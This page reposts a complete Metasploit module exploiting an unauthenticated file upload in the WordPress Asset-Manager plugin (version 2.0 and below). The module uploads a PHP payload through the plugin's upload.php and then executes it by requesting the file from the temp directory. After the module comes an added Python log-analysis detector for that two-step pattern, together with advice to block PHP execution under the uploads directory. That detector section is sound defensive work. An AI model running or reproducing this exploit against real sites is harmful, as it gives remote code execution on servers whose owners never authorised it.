WordPress Asset-Manager PHP File Upload Vulnerability

Posted 2012-12-31 09:22:33
This module, from the Metasploit exploit library, exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows PHP file upload: a user can upload a file to a temporary directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    # Normalise the base URI so the plugin paths below can be appended directly.
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin's upload handler reads the
    # file from the "Filedata" field and keeps the client-supplied filename.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # A successful upload echoes the stored filename back in the response body.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The uploaded file lands in a web-accessible temp directory and is
    # executed by simply requesting it.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
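The module above leaves a two-step footprint in web server logs: an unauthenticated POST to the plugin's upload.php, followed shortly by a GET for a .php file under wp-content/uploads/assets/temp/. The detector below is an added example for defenders and is not part of the original post or of the Metasploit module. It parses combined-format access log lines, flags POSTs to the upload endpoint, flags any PHP file served from wp-content/uploads (generalising beyond the plugin's temp directory, since PHP should never execute from uploads), and raises the severity when the same client did both within a short window. The IP addresses, timestamps and filenames in SAMPLE_LOG are constructed, and the severity labels are the example's own convention.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined log format) for illustration only.
# Paths mirror the upload endpoint and temp directory referenced in the module.
SAMPLE_LOG = """\
203.0.113.7 - - [26/May/2012:10:15:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 38 "-" "Mozilla/5.0"
203.0.113.7 - - [26/May/2012:10:15:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/qzkwd.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.4 - - [26/May/2012:10:20:13 +0000] "GET /wordpress/wp-content/uploads/assets/temp/banner.png HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.9 - - [26/May/2012:11:02:44 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 38 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The plugin's unauthenticated upload handler.
UPLOAD_ENDPOINT_RE = re.compile(r'/wp-content/plugins/asset-manager/upload\.php$')
# Any PHP-like script requested from the uploads tree; covers the plugin's
# assets/temp/ directory but also any other plugin that stores files there.
UPLOADS_PHP_RE = re.compile(r'/wp-content/uploads/.*\.ph(p\d?|tml)$', re.IGNORECASE)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        'ip': m.group('ip'),
        'ts': datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S %z'),
        'method': m.group('method'),
        'path': m.group('path'),
        'status': int(m.group('status')),
    }


def analyse(log_text, window=timedelta(minutes=10)):
    """Return findings as (rule, client_ip, path, severity) tuples.

    Upload-endpoint POSTs are recorded per client; a later successful GET of a
    PHP file under uploads from the same client inside `window` is rated high.
    """
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    upload_times = defaultdict(list)
    findings = []

    # Pass 1: hits on the upload handler itself (legitimate use is rare and
    # should be authenticated at the application layer, which logs cannot show).
    for e in events:
        if e['method'] == 'POST' and UPLOAD_ENDPOINT_RE.search(e['path']):
            upload_times[e['ip']].append(e['ts'])
            findings.append(('upload_endpoint_post', e['ip'], e['path'], 'medium'))

    # Pass 2: PHP served from the uploads tree; correlate with pass 1 by client.
    for e in events:
        if (e['method'] == 'GET' and e['status'] == 200
                and UPLOADS_PHP_RE.search(e['path'])):
            recent_upload = any(
                timedelta(0) <= (e['ts'] - t) <= window for t in upload_times[e['ip']]
            )
            severity = 'high' if recent_upload else 'medium'
            findings.append(('php_served_from_uploads', e['ip'], e['path'], severity))

    return findings


if __name__ == '__main__':
    for rule, ip, path, severity in analyse(SAMPLE_LOG):
        print(f'{severity:6} {rule:24} {ip:15} {path}')
```

The second rule is the durable one: a web server that refuses to execute PHP under wp-content/uploads (a deny rule for *.php in that directory at the Apache or nginx layer) neutralises the execution step regardless of which plugin accepted the file, and any 200 response for a .php path there is worth an alert even after the plugin is patched or removed.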